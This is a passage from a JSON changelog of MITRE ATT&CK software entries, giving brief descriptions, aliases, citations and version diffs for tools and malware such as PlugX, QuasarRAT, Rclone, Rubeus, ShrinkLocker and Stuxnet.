                            "description": "Vasilenko, R. (2013, December 17). An Analysis of PlugX Malware. Retrieved November 24, 2015.",
                            "url": "https://lastline3.rssing.com/chan-29044929/all_p1.html#c29044929a2"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "PlugX",
                        "Thoper",
                        "TVT",
                        "DestroyRAT",
                        "Sogu",
                        "Kaba",
                        "Korplug"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Kyaw Pyiyt Htet (@KyawPyiytHtet)"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "3.3",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_contributors']\": [\"Kyaw Pyiyt Htet (@KyawPyiytHtet)\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-11-20 22:48:45.121000+00:00\", \"old_value\": \"2025-09-11 18:28:54.041000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.3\", \"old_value\": \"3.2\"}}}",
                    "previous_version": "3.2",
                    "version_change": "3.2 \u2192 3.3"
                },
                {
                    "type": "tool",
                    "id": "tool--da04ac30-27da-4959-a67d-450ce47d9470",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2018-10-17 00:14:20.652000+00:00",
                    "modified": "2026-04-17 19:56:22.409000+00:00",
                    "name": "QuasarRAT",
                    "description": "[QuasarRAT](https://attack.mitre.org/software/S0262) is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. [QuasarRAT](https://attack.mitre.org/software/S0262) is developed in the C# language.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0262",
                            "external_id": "S0262"
                        },
                        {
                            "source_name": "QuasarRAT",
                            "description": "(Citation: GitHub QuasarRAT) (Citation: Volexity Patchwork June 2018) (Citation: TrendMicro Patchwork Dec 2017)"
                        },
                        {
                            "source_name": "xRAT",
                            "description": "(Citation: TrendMicro Patchwork Dec 2017)(Citation: Securelist APT10 March 2021)"
                        },
                        {
                            "source_name": "Securelist APT10 March 2021",
                            "description": "GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.",
                            "url": "https://securelist.com/apt10-sophisticated-multi-layered-loader-ecipekac-discovered-in-a41apt-campaign/101519/"
                        },
                        {
                            "source_name": "TrendMicro Patchwork Dec 2017",
                            "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.",
                            "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
                        },
                        {
                            "source_name": "GitHub QuasarRAT",
                            "description": "MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018.",
                            "url": "https://github.com/quasar/QuasarRAT"
                        },
                        {
                            "source_name": "Volexity Patchwork June 2018",
                            "description": "Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.",
                            "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "QuasarRAT",
                        "xRAT"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Kyaw Pyiyt Htet, @KyawPyiytHtet"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "2.2",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 19:56:22.409000+00:00\", \"old_value\": \"2024-05-07 19:10:03.843000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.2\", \"old_value\": \"2.1\"}}}",
                    "previous_version": "2.1",
                    "version_change": "2.1 \u2192 2.2"
                },
                {
                    "type": "tool",
                    "id": "tool--59096109-a1dd-463b-87e7-a8d110fe3a79",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2022-08-30 13:02:36.422000+00:00",
                    "modified": "2026-04-20 13:39:30.460000+00:00",
                    "name": "Rclone",
                    "description": "[Rclone](https://attack.mitre.org/software/S1040) is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. [Rclone](https://attack.mitre.org/software/S1040) has been used in a number of ransomware campaigns, including those associated with the [Conti](https://attack.mitre.org/software/S0575) and DarkSide Ransomware-as-a-Service operations.(Citation: Rclone)(Citation: Rclone Wars)(Citation: Detecting Rclone)(Citation: DarkSide Ransomware Gang)(Citation: DFIR Conti Bazar Nov 2021)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S1040",
                            "external_id": "S1040"
                        },
                        {
                            "source_name": "Detecting Rclone",
                            "description": " Aaron Greetham. (2021, May 27). Detecting Rclone \u2013 An Effective Tool for Exfiltration. Retrieved August 30, 2022.",
                            "url": "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/"
                        },
                        {
                            "source_name": "DFIR Conti Bazar Nov 2021",
                            "description": "DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.",
                            "url": "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/"
                        },
                        {
                            "source_name": "Rclone Wars",
                            "description": "Justin Schoenfeld and Aaron Didier. (2021, May 4). Rclone Wars: Transferring leverage in a ransomware attack. Retrieved August 30, 2022.",
                            "url": "https://redcanary.com/blog/rclone-mega-extortion/"
                        },
                        {
                            "source_name": "Rclone",
                            "description": "Nick Craig-Wood. (n.d.). Rclone syncs your files to cloud storage. Retrieved August 30, 2022.",
                            "url": "https://rclone.org"
                        },
                        {
                            "source_name": "DarkSide Ransomware Gang",
                            "description": "Ramarcus Baylor. (2021, May 12). DarkSide Ransomware Gang: An Overview. Retrieved August 30, 2022.",
                            "url": "https://unit42.paloaltonetworks.com/darkside-ransomware/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Rclone"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Edward Millington",
                        "Ian McKay"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "Windows",
                        "macOS"
                    ],
                    "x_mitre_version": "1.3",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-20 13:39:30.460000+00:00\", \"old_value\": \"2025-10-14 18:39:05.993000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.3\", \"old_value\": \"1.2\"}}}",
                    "previous_version": "1.2",
                    "version_change": "1.2 \u2192 1.3"
                },
                {
                    "type": "tool",
                    "id": "tool--7cd0bc75-055b-4098-a00e-83dc8beaff14",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-01-29 18:55:20.245000+00:00",
                    "modified": "2026-04-23 03:33:15.712000+00:00",
                    "name": "Remcos",
                    "description": "[Remcos](https://attack.mitre.org/software/S0332) is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. [Remcos](https://attack.mitre.org/software/S0332) has been observed being used in malware campaigns.(Citation: Riskiq Remcos Jan 2018)(Citation: Talos Remcos Aug 2018)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0332",
                            "external_id": "S0332"
                        },
                        {
                            "source_name": "Remcos",
                            "description": "(Citation: Riskiq Remcos Jan 2018)(Citation: Fortinet Remcos Feb 2017)(Citation: Talos Remcos Aug 2018)"
                        },
                        {
                            "source_name": "Fortinet Remcos Feb 2017",
                            "description": "Bacurio, F., Salvio, J. (2017, February 14). REMCOS: A New RAT In The Wild. Retrieved November 6, 2018.",
                            "url": "https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html"
                        },
                        {
                            "source_name": "Talos Remcos Aug 2018",
                            "description": "Brumaghin, E., Unterbrink, H. (2018, August 22). Picking Apart Remcos Botnet-In-A-Box. Retrieved November 6, 2018.",
                            "url": "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html"
                        },
                        {
                            "source_name": "Riskiq Remcos Jan 2018",
                            "description": "Klijnsma, Y. (2018, January 23). Espionage Campaign Leverages Spear Phishing, RATs Against Turkish Defense Contractors. Retrieved November 6, 2018.",
                            "url": "https://web.archive.org/web/20180124082756/https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Remcos"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.4",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 03:33:15.712000+00:00\", \"old_value\": \"2025-04-16 20:38:53.082000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.4\", \"old_value\": \"1.3\"}}}",
                    "previous_version": "1.3",
                    "version_change": "1.3 \u2192 1.4"
                },
                {
                    "type": "tool",
                    "id": "tool--e33267fe-099f-4af2-8730-63d49f8813b2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-03-29 20:19:26.940000+00:00",
                    "modified": "2026-04-19 16:35:49.683000+00:00",
                    "name": "Rubeus",
                    "description": "[Rubeus](https://attack.mitre.org/software/S1071) is a C# toolset designed for raw Kerberos interaction that has been used since at least 2020, including in ransomware operations.(Citation: GitHub Rubeus March 2023)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)",
                    "revoked": false,
                    "labels": [
                        "tool"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S1071",
                            "external_id": "S1071"
                        },
                        {
                            "source_name": "GitHub Rubeus March 2023",
                            "description": "Harmj0y. (n.d.). Rubeus. Retrieved March 29, 2023.",
                            "url": "https://github.com/GhostPack/Rubeus"
                        },
                        {
                            "source_name": "FireEye KEGTAP SINGLEMALT October 2020",
                            "description": "Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.",
                            "url": "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html"
                        },
                        {
                            "source_name": "DFIR Ryuk 2 Hour Speed Run November 2020",
                            "description": "The DFIR Report. (2020, November 5). Ryuk Speed Run, 2 Hours to Ransom. Retrieved November 6, 2020.",
                            "url": "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/"
                        },
                        {
                            "source_name": "DFIR Ryuk's Return October 2020",
                            "description": "The DFIR Report. (2020, October 8). Ryuk\u2019s Return. Retrieved October 9, 2020.",
                            "url": "https://thedfirreport.com/2020/10/08/ryuks-return/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Rubeus"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Mayuresh Dani, Qualys",
                        "Akshat Pradhan, Qualys"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.2",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-19 16:35:49.683000+00:00\", \"old_value\": \"2025-04-16 20:38:56.949000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}}",
                    "previous_version": "1.1",
                    "version_change": "1.1 \u2192 1.2"
                },
                {
                    "type": "malware",
                    "id": "malware--3fc44c12-b16e-4de1-8869-cf0eb4446070",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2024-12-07 16:10:56.078000+00:00",
                    "modified": "2026-01-26 20:55:58.133000+00:00",
                    "name": "ShrinkLocker",
                    "description": "[ShrinkLocker](https://attack.mitre.org/software/S1178) is a VBS-based malicious script that leverages the legitimate Bitlocker application to encrypt files on victim systems for ransom. [ShrinkLocker](https://attack.mitre.org/software/S1178) functions by using Bitlocker to encrypt files, then renames impacted drives to the adversary\u2019s contact email address to facilitate communication for the ransom payment.(Citation: Kaspersky ShrinkLocker 2024)(Citation: Splunk ShrinkLocker 2024)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S1178",
                            "external_id": "S1178"
                        },
                        {
                            "source_name": "Kaspersky ShrinkLocker 2024",
                            "description": "Cristian Souza, Eduardo Ovalle, Ashley Mu\u00f1oz, & Christopher Zachor. (2024, May 23). ShrinkLocker: Turning BitLocker into ransomware. Retrieved December 7, 2024.",
                            "url": "https://securelist.com/ransomware-abuses-bitlocker/112643/"
                        },
                        {
                            "source_name": "Splunk ShrinkLocker 2024",
                            "description": "Splunk Threat Research Team , Teoderick Contreras. (2024, September 5). ShrinkLocker Malware: Abusing BitLocker to Lock Your Data. Retrieved December 7, 2024.",
                            "url": "https://www.splunk.com/en_us/blog/security/shrinklocker-malware-abusing-bitlocker-to-lock-your-data.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "ShrinkLocker"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Cristian Souza - Kaspersky GERT"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-26 20:55:58.133000+00:00\", \"old_value\": \"2025-03-09 16:11:02.671000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1"
                },
                {
                    "type": "malware",
                    "id": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-12-14 17:34:58.457000+00:00",
                    "modified": "2026-04-24 02:36:25.135000+00:00",
                    "name": "Stuxnet",
                    "description": "[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex malware that utilized multiple behaviors, including numerous zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) ",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/software/S0603",
                            "external_id": "S0603"
                        },
                        {
                            "source_name": "W32.Stuxnet",
                            "description": "(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) "
                        },
                        {
                            "source_name": "CISA ICS Advisory ICSA-10-272-01",
                            "description": "CISA. (2010, September 10). ICS Advisory (ICSA-10-272-01). Retrieved December 7, 2020.",
                            "url": "https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01"
                        },
                        {
                            "source_name": "ESET Stuxnet Under the Microscope",
                            "description": "Matrosov, A., Rodionov, E., Harley, D., Malcho, J.. (n.d.). Stuxnet Under the Microscope. Retrieved December 7, 2020.",
                            "url": "https://web-assets.esetstatic.com/wls/2012/11/Stuxnet_Under_the_Microscope.pdf"
                        },
                        {
                            "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011",
                            "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved November 17, 2024.",
                            "url": "https://docs.broadcom.com/doc/security-response-w32-stuxnet-dossier-11-en"
                        },
                        {
                            "source_name": "Langer Stuxnet",
                            "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.",
                            "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_aliases": [
                        "Stuxnet",
                        "W32.Stuxnet"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "ics-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.5",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 02:36:25.135000+00:00\", \"old_value\": \"2025-01-02 19:40:26.678000+00:00\"}, \"root['description']\": {\"new_value\": \"[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex malware that utilized multiple behaviors, including numerous zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) \", \"old_value\": \"[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011) \"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.5\", \"old_value\": \"1.4\"}}}",
                    "previous_version": "1.4",
                    "version_change": "1.4 \u2192 1.5",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to41__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to41__0\"><a href=\"#difflib_chg_to41__top\">t</a></td><td class=\"diff_header\" id=\"from41_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">[Stuxnet](https://attack.mitre.org/software/S0603)&nbsp;was&nbsp;the&nbsp;f</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to41__top\">t</a></td><td class=\"diff_header\" id=\"to41_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">[Stuxnet](https://attack.mitre.org/software/S0603)&nbsp;was&nbsp;the&nbsp;f</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">irst&nbsp;publicly&nbsp;reported&nbsp;piece&nbsp;of&nbsp;malware&nbsp;to&nbsp;specifically&nbsp;targ</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">irst&nbsp;publicly&nbsp;reported&nbsp;malware&nbsp;to&nbsp;specifically&nbsp;target&nbsp;indust</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">et&nbsp;industrial&nbsp;control&nbsp;systems&nbsp;devices.&nbsp;[Stuxnet](https://att</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rial&nbsp;control&nbsp;systems&nbsp;devices.&nbsp;[Stuxnet](https://attack.mitre</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ack.mitre.org/software/S0603)&nbsp;is&nbsp;a&nbsp;large&nbsp;and&nbsp;complex&nbsp;piece&nbsp;o</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">.org/software/S0603)&nbsp;is&nbsp;a&nbsp;large&nbsp;and&nbsp;complex&nbsp;malware&nbsp;that&nbsp;uti</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">f&nbsp;malware&nbsp;that&nbsp;utilized&nbsp;multiple&nbsp;different&nbsp;behaviors&nbsp;includi</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">lized&nbsp;multiple&nbsp;behaviors,&nbsp;including&nbsp;numerous&nbsp;zero-day&nbsp;vulner</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ng&nbsp;multiple&nbsp;zero-day&nbsp;vulnerabilities,&nbsp;a&nbsp;sophisticated&nbsp;Window</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">abilities,&nbsp;a&nbsp;sophisticated&nbsp;Windows&nbsp;rootkit,&nbsp;and&nbsp;network&nbsp;infe</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">s&nbsp;rootkit,&nbsp;and&nbsp;network&nbsp;infection&nbsp;routines.(Citation:&nbsp;Nicolas</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ction&nbsp;routines.(Citation:&nbsp;Nicolas&nbsp;Falliere,&nbsp;Liam&nbsp;O&nbsp;Murchu,&nbsp;E</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">&nbsp;Falliere,&nbsp;Liam&nbsp;O&nbsp;Murchu,&nbsp;Eric&nbsp;Chien&nbsp;February&nbsp;2011)(Citation</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ric&nbsp;Chien&nbsp;February&nbsp;2011)(Citation:&nbsp;CISA&nbsp;ICS&nbsp;Advisory&nbsp;ICSA-10</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">:&nbsp;CISA&nbsp;ICS&nbsp;Advisory&nbsp;ICSA-10-272-01)(Citation:&nbsp;ESET&nbsp;Stuxnet&nbsp;U</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">-272-01)(Citation:&nbsp;ESET&nbsp;Stuxnet&nbsp;Under&nbsp;the&nbsp;Microscope)(Citati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nder&nbsp;the&nbsp;Microscope)(Citation:&nbsp;Langer&nbsp;Stuxnet)&nbsp;[Stuxnet](htt</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on:&nbsp;Langer&nbsp;Stuxnet)&nbsp;[Stuxnet](https://attack.mitre.org/softw</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ps://attack.mitre.org/software/S0603)&nbsp;was&nbsp;discovered&nbsp;in&nbsp;2010</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">are/S0603)&nbsp;was&nbsp;discovered&nbsp;in&nbsp;2010,&nbsp;with&nbsp;some&nbsp;components&nbsp;bein</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">,&nbsp;with&nbsp;some&nbsp;components&nbsp;being&nbsp;used&nbsp;as&nbsp;early&nbsp;as&nbsp;November&nbsp;2008.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">g&nbsp;used&nbsp;as&nbsp;early&nbsp;as&nbsp;November&nbsp;2008.(Citation:&nbsp;Nicolas&nbsp;Falliere</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">(Citation:&nbsp;Nicolas&nbsp;Falliere,&nbsp;Liam&nbsp;O&nbsp;Murchu,&nbsp;Eric&nbsp;Chien&nbsp;Febru</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">,&nbsp;Liam&nbsp;O&nbsp;Murchu,&nbsp;Eric&nbsp;Chien&nbsp;February&nbsp;2011)&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ary&nbsp;2011)&nbsp;</span></td><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "malware",
                    "id": "malware--2683fde8-1dc4-415c-94bd-9bb95cc5b7ff",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-09-15 13:52:23.890000+00:00",
                    "modified": "2026-04-08 13:49:07.222000+00:00",
                    "name": "TONESHELL",
                    "description": "[TONESHELL](https://attack.mitre.org/software/S1239) is a custom backdoor that has been used since at least Q1 2021.(Citation: Palo Alto Unit42 STATELY TAURUS TONESHELL September 2023)   [TONESHELL](https://attack.mitre.org/software/S1239) malware has previously been leveraged by Chinese affiliated actors identified as [Mustang Panda](https://attack.mitre.org/groups/G0129).(Citation: ATTACKIQ MUSTANG PANDA TONESHELL March 2023)(Citation: Zscaler)",
                    "revoked": false,
                    "labels": [
                        "malware"
                    ],
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
